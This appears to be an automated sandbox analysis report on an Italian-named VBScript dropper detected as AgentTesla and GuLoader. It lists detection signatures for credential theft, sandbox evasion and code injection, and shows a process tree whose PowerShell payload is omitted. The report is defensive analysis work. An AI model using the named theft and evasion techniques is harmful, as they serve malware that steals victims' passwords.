Windows
Analysis Report
Richiesta urgente.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Uses a known web browser user agent for HTTP communication
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64
- wscript.exe (PID: 4088 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Richiesta urgente.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
- cmd.exe (PID: 1004 cmdline: CMD.EXE /c echo C:\Windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 4540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 5840 cmdline:
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = [obfuscated PowerShell payload omitted]